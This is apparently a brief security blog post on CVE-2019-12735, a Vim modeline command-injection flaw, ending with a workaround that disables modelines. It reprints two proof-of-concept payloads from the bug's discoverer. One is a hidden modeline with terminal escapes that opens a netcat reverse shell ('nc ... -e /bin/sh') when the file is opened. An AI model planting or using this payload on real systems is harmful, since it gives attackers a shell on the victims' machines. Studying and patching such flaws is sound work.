VIM Arbitrary Code Execution via Modelines

The exploit of the day today is a really interesting vulnerability affecting one of the most popular text editors used, The great VIM .

This vulnerability affects vim < 8.1.1365 and is cause by a plugin in vim called Modeline. Modeline is disabled in major distros but its worth looking in to if its disabled on your distro. A reddit thread was created to share some light on this.

CVE: CVE-2019-12735

This vulnerability is a really exciting one because of the impact it has on VIM. VIM is one of the biggest text editors out on the market for command line editors.

The vulnerability allows an malicious third party to perform a command injection by append malicious ascii text that is executed by the vim texteditor. This vulnerability reminds us a lot about the command inject flaw with git over ssh found in 2017. Read more about that here and here

The author of the vulnerability has published two different proof of concepts.

uname -a

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Netcat listen

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D



A work around is to disable modeline and enable the vim plugin securemodelines:

set nomodeline let g:secure_modelines_verbose = 0 let g:secure_modelines_modelines = 15

External links:

Authors PoC

Firo

Hackernews